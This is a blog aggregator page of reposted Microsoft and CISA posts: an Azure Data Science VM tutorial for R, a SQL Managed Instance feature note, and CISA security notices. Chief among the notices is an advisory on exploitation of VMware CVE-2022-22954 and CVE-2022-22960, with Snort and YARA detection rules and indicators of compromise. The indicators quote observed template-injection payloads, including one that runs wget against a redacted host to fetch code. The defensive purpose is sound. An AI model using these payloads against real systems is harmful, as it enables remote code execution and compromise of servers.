by Contributed | May 20, 2022 | Technology
This article is contributed. See the original author and article here.
The Data Science Virtual Machine (DSVM) is a powerful data science development environment where you can perform data exploration and modeling tasks. The environment comes already built and bundled with several popular data analytics and data science tools that make it easy to get started without spending 20 min to 1 hour deploying a suitable infrastructure.
A new learning experience for R developers
Also, we are delighted to announce some exciting new updates which makes R a 1st Class developer experience for learners on DSVMs and on Learn Sandboxes on MS Learn. Starting from April 2022, the DSVM offering has been enriched by DSVM for Windows 2019 v. 22.04.21, DSVM for Ubuntu 20.04 and Ubuntu 18.04 v. 22.04.27, which provide an updated R environment including the following R libraries: Cluster, Devtools Factoextra, GlueHere, Ottr, Paletteer, Patchwork, Plotly, Rmd2jupyter, Scales, Statip, Summarytools, Tidyverse, Tidymodels and Testthat.
Getting started with R on DSVMs : a guided tutorial
But how you can start using R on DSVMs in your course or lab to perform data science tasks? Let’s go through all the steps you’ll need to create a DSVM on Azure and run a R Jupyter notebook.
1. First of all, you’ll need an Azure subscription. You have not one yet, have a look on how to sign up for a free trial or to the offers dedicated to your students.
2. Sign in to the Azure Portal and search for “data science virtual machine”. Choose one of the resulting offerings by clicking on it. For this tutorial we will use Data Science Virtual Machine – Ubuntu 20.04.
3. Choose a resource group and the name of the VM you want to create as well as the Azure subscription on which the machine will be billed. Select the datacenter region closest to your physical location and, for quicker set up, select “Password” as authentication type. Then specify the username and password you’ll use to login into your virtual machine.
Click on Review + create and wait until the deploy is succesfully completed.
4. There are different ways to access your DSVM. One of these is Jupyter Hub, a multiuser Jupyter server. To connect, open a web browser from your local machine and navigate to https://your-vm-ip:8000, replacing “your-vm-ip” with the IP address you can find in the overview section of your resource.
5. At this point, you can sign in using the credentials you specified at the creation of the resource.
6. You’re now ready to start coding in R. You may browse the many sample notebooks that are available or you can create a new notebook by clicking on the R kernel button.
If you want to get more R code examples on data analysis and machine learning you can have a look to the exercise units of this MS Learn path: Create machine learning models with R and tidymodels .
7. Remember to shut down your machine when you are not using it.
Note that if you are an educator and you want to use DSVMs for you R course, you have the chance to choose if providing all your students with a single DSVM, by sharing the credentials within the class or to provide every student with a single DSVM, finding the right trade-off for you among costs and flexibility.
Keep on learning
The example above covers only one of the possible functionalities enabled by DSVMs. You can also open a session in an interactive R console or coding within RStudio, which is pre-installed in the VM. In addition, you can leverage on other Azure services for data storage and modeling and you can share code with your team by using GitHub and the pre-installed Git clients: Git Bash and Git GUI. Find out more guidance on the DSVM documentation.
by Contributed | May 19, 2022 | Technology
This article is contributed. See the original author and article here.
Link feature for Managed Instance is a new feature providing a hybrid connection between SQL Server 2016 (Enterprise, Developer and Standard editions) hosted anywhere and the fully managed PaaS service Azure SQL Managed Instance, providing unprecedented hybrid flexibility and database mobility. With an approach that uses near real-time data replication to Azure using Always On technology, you can offload workloads to read-only secondaries on Azure to take advantage of a fully managed database platform, performance, and scale. The link can be operated for as long as you need it – months and years at a time, empowering you to get all the modern benefits of Azure today without migrating to the cloud. On your modernization journey, when and if you are ready to migrate to the cloud, the link de-risks your migration experience allowing you to validate your workloads in Azure prior to migrating with a seamless and instant experience, and at your own pace. In this episode of Data Exposed with Dani Ljepava and Anna Hoffman, you’ll dive deeper into the insights of this new feature.
Watch on Data Exposed
Resources:
Link feature for Azure SQL Managed Instance (preview)
View/share our latest episodes on Microsoft Docs and YouTube!
by Scott Muniz | May 19, 2022 | Security, Technology
This article is contributed. See the original author and article here.
The Internet Systems Consortium (ISC) has released a security advisory that addresses a vulnerability affecting version 9.18.0 of ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit this vulnerability to cause a denial-of-service condition.
CISA encourages users and administrators to review the ISC advisory for CVE-2022-1183 and apply the necessary update.
by Scott Muniz | May 19, 2022 | Security, Technology
This article is contributed. See the original author and article here.
CISA has released an analysis and infographic detailing the findings from the 112 Risk and Vulnerability Assessments (RVAs) conducted across multiple sectors in Fiscal Year 2021 (FY21).
The analysis details a sample attack path comprising 11 successive tactics, or steps, a cyber threat actor could take to compromise an organization with weaknesses that are representative of those CISA observed in FY21 RVAs. The infographic highlights the three most successful techniques for each tactic that the RVAs documented. Both the analysis and the infographic map threat actor behavior to the MITRE ATT&CK® framework.
CISA encourages network defenders to review the analysis and infographic and apply the recommended mitigations to protect against the observed tactics and techniques. For information on CISA RVAs and additional services, visit the CISA Cyber Resource Hub.
by Scott Muniz | May 18, 2022 | Security, Technology
This article is contributed. See the original author and article here.
The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory (CSA) to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960).
VMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of Known Exploited Vulnerabilities on April 14 and April 15, respectively. In accordance with Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5, and May 6, 2022, respectively
Note: based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released, Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in VMware Security Advisory VMSA-2022-0014 or remove the affected software from their network until the updates can be applied.
CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information—including indicators of compromise (IOCs)—about observed exploitation at multiple other large organizations from trusted third parties.
This CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. Due to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with affected VMware products that are accessible from the internet—that did not immediately apply updates—to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.
Download the PDF version of this report (pdf, 232kb).
For a downloadable copy of IOCs, see AA22-138B.stix
CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.
- CVE-2022-22954 enables an actor with network access to trigger a server-side template injection that may result in RCE. This vulnerability affects the following products:[1]
- VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
- vIDM versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
- VMware Cloud Foundation, 4.x
- vRealize Suite LifeCycle Manager, 8.
- CVE-2022-22960 enables a malicious actor with local access to escalate privileges to root due to improper permissions in support scripts. This vulnerability affects the following products:[2]
- VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
- vIDM, versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
- vRA, version 7.6
- VMware Cloud Foundation, 3.x, 4.x,
- vRealize Suite LifeCycle Manager, 8.x
According to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user’s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems.
Threat actors have dropped post-exploitation tools, including the Dingo J-spy webshell. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. Note: analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.
Detection Methods
Signatures
Note: servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.
The following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:
alert tcp any any -> any $HTTP_PORTS (msg:”VMware:HTTP GET URI contains ‘/catalog-portal/ui/oauth/verify?error=&deviceUdid=’:CVE-2022-22954″; sid:1; rev:1; flow:established,to_server; content: “GET”; http_method; content:”/catalog-portal/ui/oauth/verify?error=&deviceUdid=”; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954; reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)
The following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:
10000001alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:”Workspace One Serverside Template Injection”;content:”GET”; http_method; content:”freemarker.template.utility.Execute”;nocase; http_uri; priority:1; sid:;rev:1;)
The following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:
rule dingo_jspy_webshell
{
strings:
$string1 = “dingo.length”
$string2 = “command = command.trim”
$string3 = “commandAction”
$string4 = “PortScan”
$string5 = “InetAddress.getLocalHost”
$string6 = “DatabaseManager”
$string7 = “ExecuteCommand”
$string8 = “var command = form.command.value”
$string9 = “dingody.iteye.com”
$string10 = “J-Spy ver”
$string11 = “no permission ,die”
$string12 = “int iPort = Integer.parseInt”
condition:
filesize < 50KB and 12 of ($string*)
}
Note: the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.
Behavioral Analysis and Indicators of Compromise
Administrators should conduct behavioral analysis on root accounts of vulnerable systems by:
- Using the indicators listed in table 1 to detect potential malicious activity.
- Reviewing systems logs and gaps in logs.
- Reviewing abnormal connections to other assets.
- Searching the command-line history.
- Auditing running processes.
- Reviewing local user accounts and groups.
- Auditing active listening ports and connections.
Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960
|
Indicator
|
Comment
|
|
IP Addresses
|
|
136.243.75[.]136
|
On or around April 12, 2022, malicious cyber actors may have used this German-registered IP address to conduct the activity. However, the actors may have used the Privax HMA VPN client to conduct operations.
|
|
Scanning, Exploitation Strings, and Commands Observed
|
|
catalog-portal/ui/oauth/verify
|
|
|
catalog
portal/ui/oauth/verify?error=&deviceUdid=${“freemarker.template.utility.Execute”?new()(“cat /etc/hosts”)}
|
|
|
/catalog
portal/ui/oauth/verify?error=&deviceUdid=${“freemarker.template.utility.Execute”?new()(“wget -U “Hello 1.0″ -qO – http://[REDACTED]/one”)}
|
|
|
freemarker.template.utility.Execute
|
Search for this function in:
opt/vmware/horizon/workspace/logs/greenbox_web.log.
freemarker.template.utility.Execute may be legitimate but could also indicate malicious shell commands.
|
|
/opt/vmware/certproxy/bing/certproxyService.sh
|
Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.
|
|
/horizon/scripts/exportCustomGroupUsers.sh
|
Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.
|
|
/horizon/scripts/extractUserIdFromDatabase.sh
|
Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.
|
|
Files
|
|
horizon.jsp
|
Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib:
|
|
jquery.jsp
|
Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib:
|
|
Webshells
|
|
jspy
|
|
|
godzilla
|
|
|
tomcatjsp
|
|
Incident Response
If administrators discover system compromise, CISA recommends they:
- Immediately isolate affected systems.
- Collect and review relevant logs, data, and artifacts.
- Consider soliciting support from a third-party incident response organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
- Report incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870)
CISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in ED 22-03 Mitigate VMware Vulnerabilities, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in VMware Security Advisory VMSA-2022-0014 or to remove the affected software from the agency network until the updates can be applied.
Resources
Recent Comments